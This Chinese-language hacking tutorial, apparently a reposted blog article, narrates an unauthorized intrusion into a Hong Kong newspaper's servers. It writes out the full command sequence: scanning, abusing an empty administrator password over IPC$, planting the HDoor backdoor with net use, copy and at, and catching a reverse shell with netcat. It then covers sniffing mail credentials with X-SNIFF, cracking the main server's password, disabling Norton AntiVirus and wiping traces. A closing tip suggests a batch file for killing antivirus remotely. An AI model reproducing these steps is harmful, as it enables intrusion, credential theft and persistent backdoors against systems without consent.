一次透過(guò)SNIFF有目的性的入侵

所用武器：流光，SUPERSCAN3，HDOOR，NETCAT，3389客戶端，X-SNIFF 宿舍裝了ADSL，我瘋狂地在網(wǎng)上看電影和在QQ里泡MM（也可能是恐龍吧 :( ）。網(wǎng)絡(luò)入侵和安全方面的學(xué)習(xí)已經(jīng)荒廢了好一段時(shí)間 :( ,忽然覺(jué)得良心發(fā)現(xiàn)，是時(shí)候回到學(xué)習(xí)的位置上了，先找些機(jī)器入侵熱身一下吧！:) 剛好正在瀏覽一個(gè)香港某日?qǐng)?bào)的網(wǎng)站www.target.com.hk（名字已改），就那你開(kāi)刀吧！ 首先ping一下對(duì)方的主機(jī)拿到IP地址為202.2.*.1，然后架起superscan3對(duì)目標(biāo)進(jìn)行初探，得到以下結(jié)果： *202.2.*.1 www1
|___ 25 Simple Mail Transfer
|___ 220 ok RsProxyServer Ready..
|___ 80 World Wide Web HTTP
|___ HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Content-Location: http://202.2.*.1/Default.htm..Date: Fri, 03 Jan 2003 17:24:28 GM
|___ 110 Post Office Protocol - Version 3
|___ 135 DCE endpoint resolution
|___ 139 NETBIOS Session Service
|___ 389 Lightweight Directory Access Protocol
|___ 445 windows-nb
|___ 1433 Microsoft-SQL-Server
|___ 3389 windows--T 看來(lái)可下手的地方有四個(gè)：80，139，1433，3389。先看看有沒(méi)有輸入法漏洞吧。登陸一看，失望！只有E文輸入法。心想也是，一個(gè)服務(wù)器難道還需要什么中文輸入法讓人上ICQ嗎？3389沒(méi)戲！跟著用流光的高級(jí)掃描功能針對(duì)CGI/ASP，IIS，IPC，PLUGINS掃描一下，希望對(duì)方是個(gè)笨管理員，沒(méi)有為機(jī)器打補(bǔ)丁有NULL.PRINTER等致命的漏洞或者存在弱口令。結(jié)果再一次失望，沒(méi)有可以讓我利用的漏洞！看來(lái)網(wǎng)管還挺盡責(zé)的（TNND）。剩下1433了，愿主保佑吧！用SQL2等對(duì)目標(biāo)進(jìn)行溢出，結(jié)果還是無(wú)功而返。難道真的要讓我試分析他的網(wǎng)頁(yè)CGI結(jié)構(gòu)，找突破口嗎？我可沒(méi)有那么高手和沒(méi)那個(gè)耐力！有點(diǎn)沮喪……有點(diǎn)想放棄……郁悶ing…… 一間報(bào)社不可能就一臺(tái)服務(wù)器吧！不管那么多，用流光的簡(jiǎn)單探測(cè)模式掃他的C類網(wǎng)。結(jié)果還真的有一點(diǎn)點(diǎn)驚喜！202.2.*.18的administrator竟然是空口令！:) 不管三七二十一控制了他再說(shuō)！ Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權(quán)所有 1985-2000 Microsoft Corp. D:\>net use \\202.2.*.18\ipc$ "" /user:"administrator"
命令成功完成。（可能你會(huì)問(wèn)為什么不用流光的種植者呢？流光用多了會(huì)使人變懶！還是用命令有成就感）
D:\hack\bd\HDoor>copy nhdoor.exe \\202.2.*.18\admin$\system32\nhdoor.exe
已復(fù)制 1 個(gè)文件。
D:\hack\bd\HDoor>net time \\202.2.*.18
\\202.2.*.18 的當(dāng)前時(shí)間是 2002/12/21 上午 02:05 命令成功完成。
D:\hack\bd\HDoor>at \\202.2.*.18 02:07 nhdoor.exe
新加了一項(xiàng)作業(yè)，其作業(yè) ID = 1
D:\hack\bd\HDoor>net use \\202.2.*.18 /del
\\202.2.*.18 已經(jīng)刪除。
現(xiàn)在剩下的只有等待了………………
然后開(kāi)兩個(gè)命令提示符，一個(gè)用NC監(jiān)聽(tīng)53端口等目標(biāo)進(jìn)行反向連接：D:\hack\nc>nc -l -vv -p 53 ；另一個(gè)則用來(lái)激活目標(biāo)主動(dòng)連過(guò)來(lái)：D:\>ping 202.2.83.*.18 -l 101 -n 1
Yahoo!有反應(yīng)了 D:\hack\nc>nc -l -vv -p 53
listening on [any] 53 ...
Warning: forward host lookup failed for SKYMAIL_MX3: h_errno 11001: HOST_NOT_FOU
ND
connect to [218.15.1.157] from SKYMAIL_MX3 [202.2.*.18] 1352: HOST_NOT_FOUND -> HUC HDoor Control Password: ******** （密碼當(dāng)然不能看?。? -> Welcome and have a good luck! :) ============================== Ping BackDoor V0.41 ============================
=============== Code by Lion. Welcome to http://www.cnhonker.com ============== <C:\WINNT\system32@skymail_mx3># 拿到SHELL后當(dāng)然是在機(jī)器里參觀一下，收集需要的信息。經(jīng)過(guò)一番窺探以后，確定這是一臺(tái)郵件服務(wù)器和Secondary WINS Server。跟著進(jìn)入苦思階段，要怎樣才能把之前的202.2.*.1拿下來(lái)呢？Sniff!沒(méi)錯(cuò)！這是臺(tái)郵件服務(wù)器，嗅探進(jìn)出的數(shù)據(jù)，把登陸者的帳戶和密碼過(guò)濾出來(lái)，希望202.2.*.1的管理員會(huì)通過(guò)這郵件服務(wù)器收發(fā)郵件。馬上用NET命令把XSNIFF上傳上去，運(yùn)行XSNIFF -PASS -HIDE -LOG PASS.LOG?，F(xiàn)在只有等待了，擦掉腳印走人，睡覺(jué)！ 十幾天過(guò)去了，登陸上202.2.*.18把PASS.LOG拿下來(lái)。呵呵，收集到的信息還挺多的！:) 但不知道有沒(méi)有收集到202.2.*.1的管理員的信息。我把收集到的郵件帳號(hào)、帳戶名、密碼做成了一部字典，然后用流光對(duì)準(zhǔn)202.2.*.1的139跑。我的努力果然沒(méi)白費(fèi)，密碼拿到了，是 b3JhY2xl 幸虧我當(dāng)時(shí)沒(méi)有頭腦發(fā)熱去對(duì)他暴力破解，不然…… :( 最后當(dāng)然是放后門，保護(hù)勝利成果。
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權(quán)所有 1985-2000 Microsoft Corp. D:\>net use \\202.2.*.1\ipc$ "b3JhY2xl" /user:"administrator"
命令成功完成。
D:\hack\bd\HDoor>copy nhdoor.exe \\202.2.*.1\admin$\system32\nhdoor.exe
已復(fù)制 1 個(gè)文件。
D:\hack\bd\HDoor>net time \\202.2.*.1
\\202.2.*.1 的當(dāng)前時(shí)間是 2003/1/3 上午 01:17 命令成功完成。
D:\hack\bd\HDoor>at \\202.2.*.1 01:19 nhdoor.exe
新加了一項(xiàng)作業(yè)，其作業(yè) ID = 1
跟著用NETCAT等待他主動(dòng)連過(guò)來(lái)。奇怪！沒(méi)反應(yīng)！心想可能是HDOOR不行吧，換個(gè)ICMD后門試試，也不行，TELNET不上去！郁悶ing……接著連上他的3389看一下。奇怪！在SYSTEM32里面沒(méi)有我剛才所復(fù)制的文件，但剛才明明提示說(shuō)已復(fù)制??！然后我用net use k: \\202.2.*.1\admin$\system32把SYSTEM32影射為K盤，直接進(jìn)行復(fù)制粘貼，奇怪，明明粘貼過(guò)去了，但K盤卻沒(méi)有復(fù)制過(guò)去的文件，百思不得其解。算了，反正拿到administrator的密碼，算完成任務(wù)了。接著又連上3389，在他那里四處逛逛，看有什么好玩的，打開(kāi)事件查看器看了一下，在應(yīng)用程序日記里最前有幾條錯(cuò)誤，來(lái)源是Norton AntiVirus，引起了我的注意！打開(kāi)描述一看，是說(shuō)發(fā)現(xiàn)了病毒并刪除掉，而文件名就是我COPY的那些！看來(lái)迷團(tuán)解開(kāi)了，我馬上在服務(wù)管理里把Norton AntiVirus Client停掉，然后像之前那樣把nhdoor復(fù)制過(guò)去，OK！我的nhdoor在SYSTEM32里面出現(xiàn)了！:)
最后當(dāng)然是啟動(dòng)后門，擦腳印（可恨的是Norton里的病毒日記不知道怎樣刪掉，到時(shí)候被管理員發(fā)現(xiàn)就慘啦！） 事后總結(jié)： 這一次入侵，覺(jué)得應(yīng)該還有其他方法對(duì)目標(biāo)機(jī)器進(jìn)行入侵（等我實(shí)驗(yàn)成功后再寫出來(lái)）。這次入侵的關(guān)鍵突破口就是管理員的郵箱密碼與登陸密碼相同。對(duì)于大多數(shù)的人來(lái)說(shuō)凡是需要密碼的地方都會(huì)用同一個(gè)密碼，這樣是不可取的，這樣就會(huì)造成城門失火秧及池漁。還有就是在停掉Norton AntiVirus Client時(shí)，如果對(duì)方?jīng)]有開(kāi)3389的話，可以自己寫一個(gè).bat文件copy過(guò)去用AT加任務(wù)運(yùn)行，把Norton AntiVirus Client停掉，因?yàn)?
Norton只對(duì)病毒有效，而.bat是自己寫的，當(dāng)然不是什么病毒啦！

版權(quán)聲明：本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái)，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。